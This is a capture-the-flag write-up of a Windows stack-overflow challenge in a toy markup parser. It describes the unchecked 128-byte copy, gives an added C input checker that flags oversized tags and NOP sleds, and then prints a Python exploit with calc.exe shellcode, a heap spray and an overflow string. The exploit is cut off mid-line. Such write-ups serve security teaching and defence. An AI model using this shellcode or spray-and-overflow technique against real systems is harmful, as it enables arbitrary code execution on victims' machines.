|=-----------------------------------------------------------------------=|
|=--------------=[ Julian Cohen's Exploitation Challenge ]=--------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ by smd@RPISEC ]=---------------------------=|
|=-----------------------------------------------------------------------=|

-- [ Intro

For this challenge, we were given a 32-bit PE file. The goal was to write an
exploit, send it to Julian, and one-shot pop calc.exe on a Win7 x64 box. We
spent most of our time on another challenge, so we didn't really look into
this during the competition. Which was unfortunate, since it really wasn't
that hard.

At first look, we can see that this is simulating an implementation of the
CSAW Mark Up Language browser. It parses and builds the CSAW Unit Model, or
CUM. A quote from the binary: "After parsing, CUM is drawn all over the
screen", hehe.

So, our first step is to try and create a valid .cml file. We do this by
seeing how it parses them. A quick glance, and you can see a switch table.
The switch table contains all the tags you could use. The following tags
exist:

  link
  bold
  italics
  blink
  test object
  underline

So a valid cml file would look like this:

  Bhello worldB

This will print a BOLD OBJECT to the screen. The app will first iterate
through the file and create the tag objects. Once all the objects exist, it
will then draw CUM all over the screen!

-- [ The Vulnerability

The vulnerability occurs in the "A" tag. When CUMing, it will first copy the
data created on the heap to a 128 byte buffer on the stack. Guess what...no
bounds check! So we have a straightforward stack buffer overflow. However,
since this is Win7, we have ASLR + DEP! For this challenge though, Julian was
kind enough to give us an executable heap :) So with a simple heap spray, we
can easily defeat ASLR.
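Added here as a defender-side example, not code from the original write-up
or from the challenge binary: a small C pre-parser that walks a .cml byte
string and refuses the two things the vulnerability needs. It assumes the
single-character open/close tag format that "Bhello worldB" suggests (no
nesting is modelled), flags any "A" tag whose payload is longer than the
128-byte stack buffer the write-up describes, and flags any tag whose payload
carries a long run of 0x90, the heap-spray pattern. The tag struct, the
64-byte NOP-run threshold and the three sample inputs are constructed for
this example.

```c
#include <stdio.h>
#include <string.h>

#define MAX_TAGS  64
#define LINK_BUF  128   /* size of the stack buffer the write-up reports for "A" */
#define SLED_MIN  64    /* constructed threshold: this many 0x90 in a row is flagged */

/* One parsed element. The layout is an assumption for this example, not the
 * challenge binary's own object. */
typedef struct {
    unsigned char tag;           /* delimiter character, e.g. 'A', 'B', 'T' */
    const unsigned char *data;   /* payload between the two delimiters */
    size_t len;                  /* payload length in bytes */
} cml_tag;

/* Split a flat .cml byte string into tags. Assumes one character opens an
 * element and the same character closes it, with no nesting. Returns the tag
 * count, or -1 if a tag is never closed or the output table is full. */
int cml_parse(const unsigned char *buf, size_t n, cml_tag *out, int max_out)
{
    int count = 0;
    size_t i = 0;
    while (i < n) {
        unsigned char t = buf[i];
        const unsigned char *start = buf + i + 1;
        const unsigned char *end = memchr(start, t, n - (i + 1));
        if (end == NULL || count == max_out)
            return -1;
        out[count].tag  = t;
        out[count].data = start;
        out[count].len  = (size_t)(end - start);
        count++;
        i = (size_t)(end - buf) + 1;
    }
    return count;
}

/* Length of the longest run of 0x90 bytes in a payload. */
static size_t longest_nop_run(const unsigned char *p, size_t n)
{
    size_t best = 0, cur = 0;
    for (size_t i = 0; i < n; i++) {
        cur = (p[i] == 0x90) ? cur + 1 : 0;
        if (cur > best)
            best = cur;
    }
    return best;
}

/* Input check to run before the file reaches the real parser. Returns the
 * number of findings: an "A" payload that cannot fit the 128-byte stack
 * buffer (the unchecked copy the write-up describes would overflow), or any
 * payload holding a long 0x90 run. A malformed file counts as one finding. */
int cml_check(const unsigned char *buf, size_t n)
{
    cml_tag tags[MAX_TAGS];
    int count = cml_parse(buf, n, tags, MAX_TAGS);
    int findings = 0;

    if (count < 0) {
        printf("reject: malformed or unterminated tag\n");
        return 1;
    }
    for (int k = 0; k < count; k++) {
        size_t run = longest_nop_run(tags[k].data, tags[k].len);
        if (tags[k].tag == 'A' && tags[k].len > LINK_BUF) {
            printf("tag %d: 'A' payload of %zu bytes exceeds the %d-byte buffer\n",
                   k, tags[k].len, LINK_BUF);
            findings++;
        }
        if (run >= SLED_MIN) {
            printf("tag %d: '%c' payload holds a %zu-byte NOP run\n",
                   k, tags[k].tag, run);
            findings++;
        }
    }
    return findings;
}

/* Constructed samples: a benign file, an oversized link, a sprayed T tag. */
int demo_benign(void)
{
    static const unsigned char doc[] = "Bhello worldBTokT";
    return cml_check(doc, sizeof doc - 1);        /* 0 findings */
}

int demo_overflow(void)
{
    unsigned char doc[1 + 132 + 1];               /* "A" + 132 x 'D' + "A" */
    doc[0] = 'A';
    memset(doc + 1, 'D', 132);
    doc[133] = 'A';
    return cml_check(doc, sizeof doc);            /* 1 finding */
}

int demo_spray(void)
{
    unsigned char doc[1 + 200 + 1];               /* "T" + 200 x 0x90 + "T" */
    doc[0] = 'T';
    memset(doc + 1, 0x90, 200);
    doc[201] = 'T';
    return cml_check(doc, sizeof doc);            /* 1 finding */
}

int main(void)
{
    printf("benign: %d, overflow: %d, spray: %d\n",
           demo_benign(), demo_overflow(), demo_spray());
    return 0;
}
```

The length comparison in cml_check is exactly the check the draw routine
should have made before copying the heap data into its stack buffer; if the
routine also appends a terminator, the limit belongs one byte lower. The NOP
run heuristic is a coarse signal only and is no substitute for the missing
bounds check.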
-- [ The Exploit

#!/usr/bin/env python
from struct import pack

# windows/exec calc.exe
# 227 bytes
scode = "\xba\x1c\xb7\x2f\xeb\xd9\xc0\xd9\x74\x24\xf4\x5e\x31\xc9" + \
        "\xb1\x33\x83\xc6\x04\x31\x56\x0e\x03\x4a\xb9\xcd\x1e\x8e" + \
        "\x2d\x98\xe1\x6e\xae\xfb\x68\x8b\x9f\x29\x0e\xd8\xb2\xfd" + \
        "\x44\x8c\x3e\x75\x08\x24\xb4\xfb\x85\x4b\x7d\xb1\xf3\x62" + \
        "\x7e\x77\x3c\x28\xbc\x19\xc0\x32\x91\xf9\xf9\xfd\xe4\xf8" + \
        "\x3e\xe3\x07\xa8\x97\x68\xb5\x5d\x93\x2c\x06\x5f\x73\x3b" + \
        "\x36\x27\xf6\xfb\xc3\x9d\xf9\x2b\x7b\xa9\xb2\xd3\xf7\xf5" + \
        "\x62\xe2\xd4\xe5\x5f\xad\x51\xdd\x14\x2c\xb0\x2f\xd4\x1f" + \
        "\xfc\xfc\xeb\x90\xf1\xfd\x2c\x16\xea\x8b\x46\x65\x97\x8b" + \
        "\x9c\x14\x43\x19\x01\xbe\x00\xb9\xe1\x3f\xc4\x5c\x61\x33" + \
        "\xa1\x2b\x2d\x57\x34\xff\x45\x63\xbd\xfe\x89\xe2\x85\x24" + \
        "\x0e\xaf\x5e\x44\x17\x15\x30\x79\x47\xf1\xed\xdf\x03\x13" + \
        "\xf9\x66\x4e\x79\xfc\xeb\xf4\xc4\xfe\xf3\xf6\x66\x97\xc2" + \
        "\x7d\xe9\xe0\xda\x57\x4e\x1e\x91\xfa\xe6\xb7\x7c\x6f\xbb" + \
        "\xd5\x7e\x45\xff\xe3\xfc\x6c\x7f\x10\x1c\x05\x7a\x5c\x9a" + \
        "\xf5\xf6\xcd\x4f\xfa\xa5\xee\x45\x99\x28\x7d\x05\x70\xcf" + \
        "\x05\xac\x8c"

def pwn():
    f = open('fuck.cml', 'w')

    # heap spray block inside a "T" (test object) tag
    block = "T"
    block += "\x90"*(0xFFFF-len(scode))
    block += scode
    block += "T"

    # overflow
    of = "A" + "D"*132 + pack("